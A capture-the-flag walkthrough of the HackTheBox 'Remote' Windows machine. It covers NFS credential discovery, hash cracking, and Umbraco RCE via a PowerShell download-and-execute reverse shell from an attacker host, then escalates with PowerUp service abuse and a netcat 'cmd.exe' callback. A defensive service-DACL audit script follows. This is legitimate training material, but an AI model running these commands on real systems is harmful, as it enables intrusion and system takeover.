We covered the HackTheBox Remote machine as part of the CREST CRT (Registered Penetration Tester) track. We demonstrated Umbraco CMS exploitation and more than one path to escalate privileges on Windows.
Remote is an easy difficulty Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password. This password has been reused with the local administrator account. Using `psexec` with these credentials returns a SYSTEM shell.
Initial Enumeration
I started with an Nmap scan, which revealed open ports, including Port 80 (HTTP), Port 2049 (NFS), and SMB ports (445, 135, 139). I decided to begin by examining the web server.
Web Server Enumeration
I identified the website as using the Umbraco Content Management System (CMS). The administration panel is typically found under the `/umbraco` directory. A search for exploits revealed an authenticated remote code execution vulnerability for Umbraco.
NFS Enumeration and Credential Discovery
I used the `showmount -e [IP_ADDRESS]` command to list NFS shares. I found an open share named `site_backups` with “everyone” permissions. I mounted the share locally using `mount -t nfs [IP_ADDRESS]:/site_backups /mnt/`.
Inside the mounted share, I found a file named `Umbraco.sdf` in the `updater` directory, which is a database file. I used the `strings Umbraco.sdf | less` command to extract readable information from the database file. This revealed usernames and password hashes, and I focused on the hash for `admin@htb.local`.
Password Cracking
I used Hashcat to crack the SHA1 hash with `hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force`. This process takes time, so I didn’t run it live but noted the command.
Exploitation
I then used a Python exploit script for Umbraco. The command to run the exploit was: `python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')"`. This command downloads and executes a PowerShell reverse shell (`shell.ps1`) from my attacker machine.
I started a Python HTTP server on my machine to serve the `shell.ps1` file using `python3 -m http.server [PORT]`. I also set up a Netcat listener on my machine to receive the reverse shell with `nc -lvp 4545`. I modified the `shell.ps1` script to connect back to my IP and port 4545.
Post-Exploitation – Initial Foothold
Once the reverse shell was caught, I ran `systeminfo` to gather system details and `whoami` to identify the current user, which was `iis apppool\defaultapppool`. I also used `whoami /priv` to check user privileges.
Privilege Escalation
I used the PowerUp PowerShell script for privilege escalation enumeration. I downloaded the script to the victim machine (e.g., into `c:\users\public`) using `iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1')` or `(New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1')`.
I then executed PowerUp by importing its functions (`. .\powerup.ps1`) and running `Invoke-AllChecks`. PowerUp identified two potential privilege escalation vectors: Juicy Potato (due to `SeImpersonatePrivilege`) and Service Abuse (UsoSvc). I skipped Juicy Potato as it’s a common technique.
PowerUp suggested `Invoke-ServiceAbuse -Name UsoSvc`. Running this command by default creates a new user and adds them to the administrators group, but this user might not be able to log in via WinRM.
I opted for a modified service abuse to get a direct administrator shell. I downloaded Netcat (`nc.exe`) to the victim machine (e.g., `c:\users\public`). I started a new Netcat listener on my attacker machine: `nc -lvp 4547`. Then, I used the `Invoke-ServiceAbuse` command with a custom command to connect back: `Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe"`. This resulted in a shell as `nt authority\system`, which I confirmed with `whoami`.
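The service-abuse path above works because a low-privileged principal holds reconfiguration rights on a service's security descriptor. The following audit script is an added example (not from the original post or from PowerUp) that a defender can run as an administrator on a Windows host to find such services; it assumes the built-in `sc.exe sdshow` output and the .NET `RawSecurityDescriptor` class, and the list of "low-privileged" SIDs is a constructed choice you may extend.

```powershell
# Added example: audit service DACLs for rights that let non-administrators
# reconfigure a service (the weakness PowerUp reports as "Service Abuse").
# Run in an elevated PowerShell session on the host being audited.

# Service-object access bits (winsvc.h / winnt.h) that allow service takeover.
$ChangeConfig = 0x0002       # SERVICE_CHANGE_CONFIG: change binPath or start account
$WriteDac     = 0x40000      # WRITE_DAC: rewrite the DACL itself
$WriteOwner   = 0x80000      # WRITE_OWNER: take ownership, then rewrite the DACL
$GenericAll   = 0x10000000   # GENERIC_ALL: implies all of the above
$Dangerous    = $ChangeConfig -bor $WriteDac -bor $WriteOwner -bor $GenericAll

# Principals an IIS app pool identity or any domain user is typically a member of.
# Constructed list; extend it with your own groups (e.g. a "Developers" SID).
$LowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-4'        # INTERACTIVE
)

function Get-WeakServiceAce {
    foreach ($svc in Get-Service) {
        # sc.exe sdshow prints the service security descriptor as an SDDL string;
        # the first non-blank line is the descriptor (services we cannot read are skipped).
        $sddl = sc.exe sdshow $svc.Name 2>$null |
            Where-Object { $_ -match '\S' } | Select-Object -First 1
        if (-not $sddl -or $sddl -notmatch '^\s*D:') { continue }

        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl.Trim())
        foreach ($ace in $sd.DiscretionaryAcl) {
            # Only allow-ACEs carrying a SID and mask are relevant.
            if ($ace -isnot [System.Security.AccessControl.KnownAce]) { continue }
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($LowPrivSids -notcontains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $Dangerous) -eq 0) { continue }

            [pscustomobject]@{
                Service   = $svc.Name
                Principal = $ace.SecurityIdentifier.Translate(
                                [System.Security.Principal.NTAccount]).Value
                Mask      = ('0x{0:X}' -f $ace.AccessMask)
            }
        }
    }
}

Get-WeakServiceAce | Format-Table -AutoSize
```

Any row returned is a service whose configuration (including the command it runs as its start account) can be changed by ordinary users; fix it by resetting the descriptor with `sc.exe sdset` so only SYSTEM and Administrators hold DC, WD and WO rights, then verify the change with `sc.exe sdshow`.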
Other Mentioned Methods (Not Demonstrated in Detail)
I also briefly considered using Metasploit, but encountered issues with shells dying immediately. I attempted to log in with the user created by PowerUp’s default service abuse using Evil-WinRM (`evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]`), but it failed due to authorization issues.
Technical Commands Used
Here are the technical commands I used:
`nmap` (for initial scanning)
`showmount -e [IP_ADDRESS]`
`mount -t nfs [IP_ADDRESS]:/site_backups /mnt/`
`strings Umbraco.sdf | less`
`hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force`
`python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')"`
`python3 -m http.server [PORT]`
`nc -lvp 4545`
`systeminfo`
`whoami`
`whoami /priv`
`iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1')`
`(New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1')`
`. .\powerup.ps1`
`Invoke-AllChecks`
`nc -lvp 4547`
`Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe"`
`evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]`